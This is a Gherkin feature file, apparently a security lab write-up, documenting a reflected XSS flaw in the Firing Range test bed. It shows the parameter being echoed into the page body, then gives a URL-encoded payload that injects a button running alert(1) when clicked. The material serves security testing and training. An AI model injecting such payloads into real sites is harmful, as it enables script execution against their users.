# language: en

Feature: Reflected XSS - HTML Contexts - Parameter - Body
  From the Firing Range system

  Background:
    Given I'm running Ubuntu 16.04
    And also using Firefox 62
    Given the following scenario
    """
    Message: HTML Contexts - Parameter - Body
    Details:
      - This class of XSS simply takes a value from the parameter
         and echoes it back in an HTML page in a specific HTML context
      - The parameter is echoed within the main BODY tag.
    """

    Scenario: Static detection
    When i visit the link, its url contains the following Query string
    """
    q: a
    """
    And its responce contains:
    """
    <head></head><body>
        a
    </body>
    """
    Then i conclude that the argument q is being written into the body

    Scenario: sploit
    When i use the following Query string
    """
    q: %3Cbutton%20onCLick%3Dalert(1)%3ETry%20me%3C%2Fbutton%3E
    """
    Then a button is shown
    When i click it
    Then an alert is shown
    Then the vulnerability is verified
